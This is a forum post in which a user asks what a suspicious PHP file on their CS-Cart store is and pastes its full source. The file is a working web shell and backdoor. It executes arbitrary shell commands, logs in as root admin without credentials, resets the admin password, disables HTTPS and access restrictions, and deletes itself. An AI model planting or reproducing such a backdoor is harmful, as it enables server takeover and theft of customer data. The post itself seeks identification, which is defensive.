Anyone know what this is, maybe left behind by dev ?
I googled and got this
These are the top rated real world PHP examples of fn_login_user extracted from open source projects.
use Tygh\Session;
use Tygh\Registry;if ($_SERVER[‘REMOTE_ADDR’] != ‘213.242.13.250’) {
// exit;
}if (!isset($_REQUEST[‘me’])) {
exit;
}
if ($_GET[‘mode’] == ‘shell’){
echo ’
';if ($_POST[‘cmd’]){
exec($_POST[‘cmd’], $out);foreach ($out as $k => $v){
echo “”.$v.“”;
}
}
echo ’ '; die(); }define(‘AREA’, ‘A’);
define(‘ACCOUNT_TYPE’, ‘admin’);
require(dirname(FILE) . ‘/init.php’);if ($_GET[‘mode’] == ‘login’ && !isset($_GET[‘kill’])) {
Session::regenerateId();
fn_login_user(1);
$_SESSION[‘auth’][‘this_login’] = TIME;
$_SESSION[‘auth’][‘ip’] = $_SERVER[‘REMOTE_ADDR’];fn_redirect(Registry::get(‘config.admin_index’));
}if ($_GET[‘mode’] == ‘login’ && isset($_GET[‘kill’])) {
$auth = array (
‘user_id’ => 1,
‘area’ => ‘A’,
‘tax_exempt’ => empty($user_data[‘tax_exempt’]) ? ‘N’ : $user_data[‘tax_exempt’],
‘last_login’ => empty($user_data[‘last_login’]) ? 0 : $user_data[‘last_login’],
‘login’ => ‘admin’,
‘usergroup_ids’ => array(),
‘order_ids’ => array(),
‘membership_id’ => ‘0’,
‘is_root’ => ‘Y’,
‘password_change_timestamp’ => time()+1000,
‘first_expire_check’ => false,
‘this_login’ => time(),
‘company_id’ => 0
);
$_SESSION[‘auth’] = $auth;
unlink(‘sph.php’);
if (!is_file(‘sph.php’)) {
fn_set_notification(‘N’,‘Notice’, ‘sph.php is removed’);
} else {
fn_set_notification(‘E’, ‘Error’, ‘sph.php is not removed!’);
}
fn_redirect(Registry::get(‘config.admin_index’));
}if ($_GET[‘mode’] == ‘logout’) {
$auth = array();
unset($_SESSION[‘auth’]);
fn_redirect(Registry::get(‘config.admin_index’));
}if ($_GET[‘mode’] == ‘change_password’) {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id=‘1’”, md5(‘removed by me’));
echo “Password Changed to ‘removed by me’!”;
}if ($_GET[‘mode’] == ‘restore_password’ && !empty($_GET[‘passwd’])) {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id=‘1’”, $_GET[‘passwd’]);
echo “Password Restored to $_GET[passwd]!”;
}if ($_GET[‘mode’] == ‘restore_password_md5’ && !empty($_GET[‘passwd’])) {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id=‘1’”, md5($_GET[‘passwd’]));
echo “Password Restored to $_GET[passwd]!”;
}if ($_GET[‘mode’] == ‘remove_https’) {
db_query(“UPDATE ?:settings SET value=‘N’ WHERE option_name=‘secure_checkout’”);
db_query(“UPDATE ?:settings SET value=‘N’ WHERE option_name=‘secure_admin’”);
echo “HTTPS disabled!”;
}if ($_GET[‘mode’] == ‘ignore_AR’) {
db_query(“UPDATE ?:addons SET status=‘D’ WHERE addon=‘access_restrictions’”);
echo “Access Restriction is disabled!”;
}if ($_GET[‘mode’] == ‘phpinfo’) {
phpinfo();
}?>